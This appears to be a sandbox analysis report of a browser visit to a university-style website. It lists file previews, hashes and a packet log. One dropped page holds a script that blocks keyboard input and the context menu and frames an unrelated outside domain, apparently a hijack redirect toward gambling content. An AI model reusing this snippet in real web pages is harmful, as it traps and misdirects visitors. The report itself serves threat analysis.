                                          Preview:...........\]..u}..............k'0...yX?.!@@IT...........)..C..$........{/.......V.X.......It........*=.~..Q.x..W.UiL...ca.|..Je...J..~..h:.{.c....>.~..........e7......~.;5....qx......U.....=......S....no?.......{..I..Oq..B.?..........m...r....C.?JQ..._7.*...y.N..s..U+.sn..7....!.TQ$o.1.k.........Yh..^|..t....~..Z.......o)04}..P....TcQg..%.n..5.][..l*.uZ..e.z.j.?l.~d....].E.6J..y6...hr.Wsx.Q.nL/.n..]+e..1.W.w".^...Zu.......x6.7.............:|.t........0.r.......6.6...>4Ok....F.....z(....}.&,...mX......I.}J..{.I.m..9..n..z..........y.{..>.f.+....M....r....r5...J~mU'.T..v..q..+x..7.yh{=k|....i.7.@%.R....q..;?....4.[;..d......O.g2_..=.....|.y.....5..U..nU.....i../w......A..U=R.i.`8.T..Z.|%".F...&...n%.B6........hh....m....{.....`.~.f_.....s.......6V....q.7v......?.+.}...Q_...e.....,..Z..2.........wz..o2.S.....d6.............8.u.E.".a...wv1Y.m<.G..U..L......^....X.h.+.K...w.V....Zj.4^...z.f7..a.,.t.....h.Ot..#..k`.7;..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (11013), with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):11020
                                          Entropy (8bit):5.483685795185953
                                          Encrypted:false
                                          SSDEEP:192:XK3b+EH+nqfhD9VUVjIItpfg5uXG3+1tSCl+7flvSXwaHxImISLTNSfYXH7Le2HE:aytnqflKFgEWulE8REcS3j/CkR1Xh3
                                          MD5:CA3C311AEA29F78A85D76E20A886DD82
                                          SHA1:A734AB1C6D1EF62E96CAC59D5C53BDF15760488C
                                          SHA-256:1437E669CCE1BAACC8BD2BA35ADCB59B9B6568DCA3FC7CCE275E1A3D525CD5E8
                                          SHA-512:49224691423228FD4E34E8FD775ED6AFAF95FFF2E28B17A0C338E662E20DCC1724D0A4580E326B05A19B1236B06BCD2962B4805BE0106DEFD8800A50E8F262C1
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/js/jquery.SuperSlide.js
                                          Preview:.....!function(a){a.fn.slide=function(b){return a.fn.slide.defaults={type:"slide",effect:"fade",autoPlay:!1,delayTime:500,interTime:2500,triggerTime:150,defaultIndex:0,titCell:".hd li",mainCell:".bd",targetCell:null,trigger:"mouseover",scroll:1,vis:1,titOnClassName:"on",autoPage:!1,prevCell:".prev",nextCell:".next",pageStateCell:".pageState",opp:!1,pnLoop:!0,easing:"swing",startFun:null,endFun:null,switchLoad:null,playStateCell:".playState",mouseOverStop:!0,defaultPlay:!0,returnDefault:!1},this.each(function(){var c=a.extend({},a.fn.slide.defaults,b),d=a(this),e=c.effect,f=a(c.prevCell,d),g=a(c.nextCell,d),h=a(c.pageStateCell,d),i=a(c.playStateCell,d),j=a(c.titCell,d),k=j.size(),l=a(c.mainCell,d),m=l.children().size(),n=c.switchLoad,o=a(c.targetCell,d),p=parseInt(c.defaultIndex),q=parseInt(c.delayTime),r=parseInt(c.interTime);parseInt(c.triggerTime);var Q,t=parseInt(c.scroll),u=parseInt(c.vis),v="false"==c.autoPlay||0==c.autoPlay?!1:!0,w="false"==c.opp||0==c.opp?!1:!0,x="false"==c.au
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (587), with no line terminators
                                          Category:downloaded
                                          Size (bytes):587
                                          Entropy (8bit):5.037025933428312
                                          Encrypted:false
                                          SSDEEP:12:Ab8dkKeCxyWF0gRvJHrtbFKNkM+fpYzObOTks0JM9EaMCz:UWkKeFARvJVgNQpYzkOV8IV9
                                          MD5:286675B3C67670C0F14297E633BE05A4
                                          SHA1:36A200D8AB5D5E37E328700DF90D061F268C57CC
                                          SHA-256:6F1E6A7E89A7B4451921BA1D6EA506A9855D4BFF2EC5F25587BF066516ACF025
                                          SHA-512:D8A6C2C2D605CF93D1397B487B6ECCD7A115DC8334877F555A1F0E7ACB031A57F169F3A4E4CC592C9AA7862ABB8440AE8467B65E2FCC0D60F967678F0BC2D444
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/urlencode.js
                                          Preview:function UrlEncode(str){var hex="";var i,t;for(i=0;i<str.length;i++){t=hexfromdec(str.charCodeAt(i));if(t=="25"){t=""}hex+="%"+t}return hex}function hexfromdec(num){if(num>65535){return("err!")}first=Math.round(num/4096-0.5);temp1=num-first*4096;second=Math.round(temp1/256-0.5);temp2=temp1-second*256;third=Math.round(temp2/16-0.5);fourth=temp2-third*16;return(""+getletter(third)+getletter(fourth))}function getletter(num){if(num<10){return num}else{if(num==10){return"A"}if(num==11){return"B"}if(num==12){return"C"}if(num==13){return"D"}if(num==14){return"E"}if(num==15){return"F"}}};
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text
                                          Category:downloaded
                                          Size (bytes):2780
                                          Entropy (8bit):4.679453948024632
                                          Encrypted:false
                                          SSDEEP:48:wJSlS+StSYnlVSYe932WavjNFL8PMPY1dP6S//6vAZtdlkZzaNZINmZZDU3Zv3Mw:wJSlS+StSkVSZ32W4jNFL8PMPEdP6S/O
                                          MD5:633098D68444FAE4FEEC36E757A6498C
                                          SHA1:83244D45A17B6BA8FBF67C41B2CE4E2322DB8421
                                          SHA-256:7FD1C34D205F2165EE1B3CC3C2FE54AF6F115C58BBD849907C3CF2BE6814B159
                                          SHA-512:F1AEBD6F3446C67BC9E11F0E3C95549431C9DD009CB2AB8EC1C95EDDAFA46AE946134CA50B9B1973A4875048C8D78A3682386CDFF8335A689DAEF27DBC61B299
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/bet365-1761/themes/style/bootstrap-dialog.min.css
                                          Preview:.bootstrap-dialog .modal-header {. border-top-left-radius: 4px;. border-top-right-radius: 4px.}...bootstrap-dialog .bootstrap-dialog-title {. color: #fff;. text-align: center;. font-size: 18px.}...bootstrap-dialog .bootstrap-dialog-message {. font-size: 14px.}...bootstrap-dialog .bootstrap-dialog-button-icon {. margin-right: 3px.}...bootstrap-dialog .bootstrap-dialog-close-button {. font-size: 20px;. float: right;. filter: alpha(opacity=90);. -moz-opacity: .9;. -khtml-opacity: .9;. opacity: .9.}...bootstrap-dialog .bootstrap-dialog-close-button:hover {. cursor: pointer;. filter: alpha(opacity=100);. -moz-opacity: 1;. -khtml-opacity: 1;. opacity: 1.}...bootstrap-dialog.type-default .modal-header {. background-color: #fff.}...bootstrap-dialog.type-default .bootstrap-dialog-title {. color: #333.}...bootstrap-dialog.type-info .modal-header {. background-color: #00a0e6.}...bootstrap-dialog.type-primary .modal-header {. backgr
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 235 x 70, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):1377
                                          Entropy (8bit):6.884886058578742
                                          Encrypted:false
                                          SSDEEP:24:ry1hiyWwh82lYSgXcVqjT3ouyJ3VzIw5GaG+iEdsovcnOTa3/ymD3rB1:rwuvn3cEjIJ3bnrF0qQ/yerB1
                                          MD5:5F356AE215DC672F258540F2C3459645
                                          SHA1:B1BA4B9448C42761AB3C8726B9655611BE0B3BB5
                                          SHA-256:BC24D6861DD031FE44E2B129FC711281E0520BB6C4A678DFF58CB43FD7EE94A3
                                          SHA-512:0EE759E47D21A1183B89912772A58B7D5F9AAFD8BB2A80CD7AA30BA5EEA400B07EFEC4ACC7E1FD14BFF3723EB937FB5485A94463DE4AFD9FCC04235C85262095
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/images/slider-arrow.png
                                          Preview:.PNG........IHDR.......F.....-.c.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:C475E6DAC91611E7B32AA2C46D9905B2" xmpMM:InstanceID="xmp.iid:C475E6D9C91611E7B32AA2C46D9905B2" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2F2618EECF8111E29588CBB348727F5A" stRef:documentID="xmp.did:2F2618EFCF8111E29588CBB348727F5A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.4......IDATx...1N.0.@.d.7..9{..3...E.........7k.m.{...p.$X%.*.*.VI.J.J.U.....`.....$X%.*.*.VI.JEz=.......|......<.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (568), with CRLF, LF line terminators
                                          Category:downloaded
                                          Size (bytes):25442
                                          Entropy (8bit):5.9332984941120515
                                          Encrypted:false
                                          SSDEEP:768:QuNdaIfF8MBmEj6yAnHTxkEITxY1BOl2d+:9qEj6yYHTxkEITx2Bk
                                          MD5:964A728DD2F0CB3822E9FBEB58FC5B25
                                          SHA1:D94E148AE158AA44A9F3D90F3248F92CC175D2BE
                                          SHA-256:2288BC3201E95FD4A8CE92FCE8F639D6AD86C361F2CE90A478EFB7C536019723
                                          SHA-512:44702F809DCB45BFC2F8F546D3CBF1540384F225887AB3C4DEBD3EFC4C7CD84388F9B40EF7C536BB67C2DCF7BB3A26A03BF944C1F1447627F7FC796A9AF8938B
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/
                                          Preview:.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><script>var V_PATH="/";window.onerror=function(){ return true; };</script><meta name="format-detection" content="telephone=no,email=no,adress=no">......<meta charset="utf-8"/>......<link href="/style/style.css" rel="stylesheet" type="text/css">..<script type="text/javascript" src="/js/jquery.js"></script>..<script type="text/javascript" src="/js/jquery.SuperSlide.js"></script>.. [if lt IE 9]>.. <script src="js/html5.js" type="text/javascript"></script>.. [endif]---->.. Announced by Visual SiteBuilder 9-->..<link rel="stylesheet" type="text/css" href="/sitegray/sitegray_d.css" />..<script language="javascript" src="/sitegray/sitegray.js"></script>.. CustomerNO:77656262657232307e7a4654525b574200010005445d -->..<link rel="stylesheet" type="text/css" href="/index.vsb.css" />..<script type="text/j
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):3504
                                          Entropy (8bit):5.038426340476661
                                          Encrypted:false
                                          SSDEEP:96:lTo2zuTliXnE2JBXXRi3nLVCJVzku+I04jifh7:7zuT922Cbou+x4O1
                                          MD5:C9E070E7C80CB1B8886B468295F9CDCF
                                          SHA1:A6766650411A7B984EC4F467EA91B359C46936F5
                                          SHA-256:2D90992D9B2819970AC3306740F825A772186030145A9A50E7D711AD96CECD0B
                                          SHA-512:ADF906A8B13A65BF62DF8FEB462AC2F7999AE9CA9CA56B842781ADB14B52F63495B8A3AAD7BACD26589309E824F50A9F97679122811D299A844D33F3FA00EA24
                                          Malicious:false
                                          Reputation:low
                                          Preview:.function _dynClicks_ajax()..{.. var xmlhttp = null;.. try.. {.. xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");.. }.. catch(e).. {.. try.. {.. xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");.. }.. catch(e).. {.. try.. {.. xmlhttp = new XMLHttpRequest();.. }.. catch(e).. {.. }.. }.. }.. return xmlhttp;..} ......function _showDynClicks(clicktype, owner, clickid)..{.. try.. {.. var dynobj = "dynclicks_" + clicktype + "_" + clickid + "_" + (Math.floor(Math.random()*1000));.. document.write("<span id=\"" + dynobj + "\" name=\"" + dynobj + "\"></span>");.. .. var url = '/system/resource/code/news/click/dynclicks.jsp?clickid='+clickid+'&owner='+owner+'&clicktype='+clicktype;.. .. var xmlhttp = _dynClicks_ajax();.. .. xmlhttp.onreadystatechange = function(){_onShowDynCl
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):95
                                          Entropy (8bit):4.60108909804675
                                          Encrypted:false
                                          SSDEEP:3:UIyPXEFuTII7VmDDxeWF4NDRVfpWWhXt6iMA:UmuEKieWSNDRXWXi9
                                          MD5:CB16B8B2FAE1A2CB3DDBA43817FDC763
                                          SHA1:C1BB1153A3EBB528F86FA5CC57DDD4BFBE9BD4AF
                                          SHA-256:66897F9CF68B725ABD635D7DC7C1F4E91C80A41779C91BD25CF3A504D8F07407
                                          SHA-512:0DABBE50FF2EA388864E9ACB9F406EDA80358C3EAD6B12FF3C64F0D5CF4A3EDF434426FC5872EA044C7503FBE04F21B6BB9F957E2ACDAD4FA0304804519ED712
                                          Malicious:false
                                          Reputation:low
                                          Preview:/*.. * -- grayscale.js --.. * Copyright (C) James Padolsey (http://james.padolsey.com).. *.. */
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 14857
                                          Category:downloaded
                                          Size (bytes):4126
                                          Entropy (8bit):7.9584178336988485
                                          Encrypted:false
                                          SSDEEP:96:YK+LFVnC8QaQV08CIFufD2xOx/mpTWTjvwCnxdBOTi:l+LFzh5r2xymVW/wmr
                                          MD5:E760677F4C48D9F9E8B95EF4B6F87FA8
                                          SHA1:1E8731B8C43003B65A5E7132D6E51D1E991EB125
                                          SHA-256:3E6115C7F94633F37AA0482064FF05299010E6B7D36B3EE8698389F83F5536C9
                                          SHA-512:1EBB5B6C821891EB74621CB973705D6B61CC3792823080FE7BA869BB1C0DC18818E6CA84F38F7C1D601A047B11D34E64AA554093430904DD9789A600AC1D0487
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/jquery.validate.extend.msites.js
                                          Preview:.............r.6.Ul.+..EKv.&.iO.8Mf...z?$.CI.."..r..".,.N......R.]....8O.....b....d...0..I0...Y..;.].d.7..0...[..j4.....g.g..a).[.._.(......bY.(.+.f..#.:Ea....z.I..Q.:..O"..`..U*.e....E...}.......h.Z.......O..^&..b.,.<.W"M..2.....Y..;..^..R.e/D..v...d..e~......8'.s..8I.......'.a..bl.0s....8.\....0...\lL..5.=y.g.h.Vx.h wO..B.E+Yz>.U#.jm/...6[..a...z-..F@?..d.h..V*....I...e.fq.?..s..uQ..r4...*ASiz...%.l.t..."...M...,...p.>c:....$.5M...r.....v.g;.M...b.+Z/..rpR...A.y3.-Z.(...1T...y.~)..!.K...`<6.Ri.$TO...bs.u.H..|.8.M....E(.)...R..,..3 ^gS.........#J+"^.......J3.9 Z...B.c.c...@.e<......9.).q..n......W.J..i.I.A.z...yd...O..P>..|..b!.q..&~.....y..Xd0.......V...m.......d...:.F.C.#.\].O.y..fX.i...^.....#MAXP_..F..ow.3.J.....k....q.>`..p..uA.w*....$....D.......Y$.<]J#..8?d....F....#..V3lZ..r............mg5LE.k5Hq.:P).....-..daP._..W. [x..2&e.:.E%..9.......[9...`.&..3..oo..+]..i8....C..V..hc$.Y...........^.......v....C&2N1..4.NEj..`. w....2....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text
                                          Category:dropped
                                          Size (bytes):608
                                          Entropy (8bit):5.300507717143507
                                          Encrypted:false
                                          SSDEEP:12:skhibx5iFFA2JjtAWJIJXp/tar74xUTfoW2AfI6Qb:skdOMjtfJoY7rg/t
                                          MD5:E86759444E99E5AA3BFBC7243D0C727F
                                          SHA1:AC30C134AC40CA09D5AB8D27A0127F101B1A9379
                                          SHA-256:8C05C2270B8FF8348AC5BD5BCE927731B29B612325BC7C83D328D4221012D667
                                          SHA-512:E6D7831CAEB36D1BE0D0BA5831E1AE424AA817245443E08CD3DCFF839C5B83DD48D65E6F4AC2E2F4184C9FF1FE6E05FD42A6F6D2823E49C2EBCA539FE674CB23
                                          Malicious:false
                                          Reputation:low
                                          Preview:<html>.<head>.<script>var V_PATH="/";window.onerror=function(){ return true; };document.onkeydown = document.onkeyup = document.onkeypress = new Function("return false;");document.oncontextmenu = new Function("return false;");</script>.<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">.<style>.html,body {height:100%;width:100%;padding:0px;margin:0px;}.</style>.<title>....</title>.</head>.<body>.<iframe src='https://1k4ej4j1lxvjwz.com/' frameborder="0" style="width:100%;height:100%;background-color:#ccc"></iframe>.</body>.</html>
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 4290
                                          Category:dropped
                                          Size (bytes):1595
                                          Entropy (8bit):7.865981113899772
                                          Encrypted:false
                                          SSDEEP:24:XV4pX+dFSHFaZFgrBd+ChHZa9wou+aX1uHVm0txB1lz4hpfB9TG1jhI:XV4puMHFBrBrhau+guM0HByVTG1jhI
                                          MD5:28FDDC8D38C86C9C8A5C05DAD65810EE
                                          SHA1:51CA286A646404F14EE093EED9A47FBF8C597C6F
                                          SHA-256:DB6F4B0A9CDE5ECA9DB17B5A49C2CFEAA53B5EC2EFF0CEF147DE4800A6E4E349
                                          SHA-512:FCE51A00681E6F10EBA8934022A54F47ACC7499728D7188F0B3A82703FA048CDD4B82C182C775C53DC0DB6A843717DCCB26B9611BAFCD34338A0CBD60EA65D61
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........WKs.6..+2..rL.rgz1.d..3.L.;9ht...."T...".{w..DJ.."...b.....S.e.\&".?'j.*H....Bn.w...]...^f..n.....,.s...f2m..,.R..$..F."..B@j.7.F3..N.'r'?.7..5...DoL....gW. .P...62_..R.....p...../..Ifw.V.?..c....T...T?'..T..n.}.L..W1_.....GW.hQ..Z....{{J....|..^0.-H.H<.}.....v'..@h.p...gU59.`.. .#.pI.g..D.'.?..X.=..........Q.+...~..jY..1...#..y...g.Q...K....L..b..P.5.J.......'L...R.9.X[..~to.$....8].A/H6..,[.."'lw...%.p...0....].7..E.....n.......,..^&.t._.g.G..h.a..u...*.....1.[.8.x.......-..wl......&i..}......>...". .i.%s....e..0*..Q...q...dM.H.3.,\..x...78[u}..;.......\..r.;L..>..[g.....z.b:..`$ _..c..5$X..u...=.a..... .......f.EF..Z..U.&....o...]..C...*......6.Vey.....o.v'... .....LIe.0...z.k..dD7.f..Gg0..._..#..c1....%O...8...5(Cj.w.bY\.....L......e@.Z.YP.@.PUU...C.J. .....l.S.HB...G.x...D....|...T..1o....+...tz...... .].....-h....=.KI[...}.=..\.]?..j..V.at.ou0{=.!.|.(4 ..pc....L..........:.~....'en.......p.'.]a..f.X..n[....Q..E.
                                          No static file info
                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 12, 2025 01:16:43.778410912 CET49675443192.168.2.4173.222.162.32
                                          Jan 12, 2025 01:16:49.678653002 CET49737443192.168.2.4142.250.185.100
                                          Jan 12, 2025 01:16:49.678698063 CET44349737142.250.185.100192.168.2.4
                                          Jan 12, 2025 01:16:49.678761005 CET49737443192.168.2.4142.250.185.100
                                          Jan 12, 2025 01:16:49.679002047 CET49737443192.168.2.4142.250.185.100
                                          Jan 12, 2025 01:16:49.679018974 CET44349737142.250.185.100192.168.2.4
                                          Jan 12, 2025 01:16:50.351768970 CET44349737142.250.185.100192.168.2.4
                                          Jan 12, 2025 01:16:50.352209091 CET49737443192.168.2.4142.250.185.100
                                          Jan 12, 2025 01:16:50.352243900 CET44349737142.250.185.100192.168.2.4
                                          Jan 12, 2025 01:16:50.353243113 CET44349737142.250.185.100192.168.2.4
                                          Jan 12, 2025 01:16:50.353338957 CET49737443192.168.2.4142.250.185.100
                                          Jan 12, 2025 01:16:50.354607105 CET49737443192.168.2.4142.250.185.100
                                          Jan 12, 2025 01:16:50.354685068 CET44349737142.250.185.100192.168.2.4
                                          Jan 12, 2025 01:16:50.402497053 CET49737443192.168.2.4142.250.185.100
                                          Jan 12, 2025 01:16:50.402533054 CET44349737142.250.185.100192.168.2.4
                                          Jan 12, 2025 01:16:50.449315071 CET49737443192.168.2.4142.250.185.100
                                          Jan 12, 2025 01:16:51.671813965 CET80497232.22.50.131192.168.2.4
                                          Jan 12, 2025 01:16:51.671948910 CET4972380192.168.2.42.22.50.131
                                          Jan 12, 2025 01:16:51.677205086 CET4972380192.168.2.42.22.50.131
                                          Jan 12, 2025 01:16:51.681996107 CET80497232.22.50.131192.168.2.4
                                          Jan 12, 2025 01:16:51.859638929 CET4973980192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:51.860044956 CET4974080192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:51.864682913 CET8049739154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:51.864769936 CET4973980192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:51.864876986 CET8049740154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:51.864928007 CET4974080192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:51.865066051 CET4973980192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:51.869839907 CET8049739154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:52.758198023 CET8049739154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:52.808460951 CET4973980192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:53.292541981 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:53.292586088 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:53.292747021 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:53.297776937 CET49743443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:53.297847033 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:53.297919035 CET49743443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:53.298151016 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:53.298160076 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:53.298496008 CET49743443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:53.298508883 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:54.516716957 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:54.517138004 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:54.517163038 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:54.518230915 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:54.518310070 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:54.522927999 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:54.523076057 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:54.523192883 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:54.534836054 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:54.535128117 CET49743443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:54.535162926 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:54.536253929 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:54.536322117 CET49743443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:54.536647081 CET49743443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:54.536709070 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:54.563338995 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:54.576327085 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:54.576351881 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:54.592186928 CET49743443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:54.592207909 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:54.623223066 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:54.638547897 CET49743443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.063721895 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.063755035 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.063764095 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.063780069 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.063786030 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.063792944 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.063874006 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.063896894 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.063908100 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.063932896 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.063939095 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.063963890 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.063999891 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.107770920 CET49742443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.107789993 CET44349742154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.110279083 CET49744443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.110327959 CET44349744154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.110429049 CET49744443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.110558987 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.110616922 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.111032009 CET49746443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.111042023 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.111069918 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.111097097 CET49746443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.111391068 CET49747443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.111398935 CET44349747154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.111629009 CET49748443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.111649036 CET49747443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.111675024 CET44349748154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.113524914 CET49743443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.113565922 CET49748443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.114095926 CET49744443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.114106894 CET44349744154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.114427090 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.114440918 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.114999056 CET49746443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.115006924 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.115521908 CET49747443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.115531921 CET44349747154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.116225004 CET49748443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.116244078 CET44349748154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.155332088 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.438551903 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.438580990 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.438590050 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.438605070 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.438611984 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.438615084 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.438642979 CET49743443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.438682079 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.438699007 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.438700914 CET49743443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.438730955 CET49743443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.446698904 CET49743443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.446717978 CET44349743154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.447290897 CET49749443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.447345018 CET44349749154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:55.447412014 CET49749443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:55.448402882 CET49749443192.168.2.4154.216.143.26
